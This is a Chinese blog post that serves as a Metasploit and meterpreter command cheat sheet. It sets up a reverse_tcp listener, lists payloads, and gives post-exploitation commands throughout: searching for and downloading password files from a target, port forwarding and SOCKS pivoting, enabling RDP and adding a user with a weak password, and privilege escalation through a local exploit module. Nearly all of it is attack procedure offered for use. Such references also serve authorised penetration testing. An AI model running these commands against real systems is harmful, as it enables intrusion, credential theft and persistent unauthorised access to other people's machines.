MSF

msf中使用 exploit监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
常见Payload

windows/meterpreter/bind_tcp #正向连接 这是一个基于TCP的正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST

windows/meterpreter/reverse_http #通过监听80端口反向连接 基于http方式的反向连接,在网速慢的情况下不稳定

windows/meterpreter/reverse_https #通过监听443端口反向连接 基于https方式的反向连接,在网速慢的情况下不稳定

常用系统命令
sessions    #sessions –h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限 
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell
基本文件类
基本文件系统命令

getwd 或者pwd # 查看当前工作目录  
ls
cd
search -f *pass*       # 搜索文件  -h查看帮助
cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容
upload /tmp/hack.txt C:\\lltest  # 上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上
edit c:\\1.txt #编辑或创建文件  没有的话,会新建文件
rm C:\\lltest\\hack.txt
mkdir lltest2  #只能在当前目录下创建文件夹
rmdir lltest2  #只能删除当前目录下文件夹
getlwd   或者 lpwd   #操作攻击者主机 查看当前目录
lcd /tmp   #操作攻击者主机 切换目录
网络类命令
ipconfig/ifconfig
netstat –ano
arp
getproxy   #查看代理信息
route   #查看路由

portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由
run post/multi/manage/autoroute  #自动添加路由


setg Proxies socks4/5:ip:port #让msf所有模块的流量都通过此代理走。(setg全局设置)
setg Proxies socks5://user:pass@127.0.0.1:1080
setg Proxies socks5:211.159.173.202:49999
set ReverseAllowProxy true
#允许反向代理,通过socks反弹shell,建立双向通道。(探测可以不设置此项)


autoroute添加完路由后,还可以利用msf自带的sock4a模块进行Socks4a代理
msf> use auxiliary/server/socks4a 
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run然后vi /etc/proxychains.conf #添加 socks4 127.0.0.1 1080
最后proxychains 使用Socks4a代理访

run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24  #扫描192.168.1.0/24这个网段
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.1.144 PORTS=3389 #检测192.168.1.144是否开启338
RDP
run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662
1.3.6.1 post提权
background
use post/multi/recon/local_exploit_suggester   (全自动:快速识别系统中可能被利用的漏洞)
set showdescription true
set session 1            
run

然后使用post检测出来的模块进行提权即可

use exploit/windows/local/ms16_075_reflection_juicy 
set session 1
set lhost 0.0.0.0
set lport 4444
run
post信息收集

获取目标机器的分区情况

run post/windows/gather/forensics/enum_drives

判断目标机是否为虚拟机:

run post/windows/gather/checkvm

查看目标机开启哪些服务

run post/windows/gather/enum_services

查看目标主机安装了哪些应用、补丁

 run post/windows/gather/enum_applications

查看目标机最近的操作

 run post/windows/gather/dumplinks

作者:qianyuzz

出处:https://www.cnblogs.com/qianyuzz/p/17735481.html

版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。

posted @   qianyuzz  阅读(68)  评论(0编辑  收藏  举报
(评论功能已被禁用)
相关博文:
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
more_horiz
keyboard_arrow_up dark_mode palette
选择主题
点击右上角即可分享
微信分享提示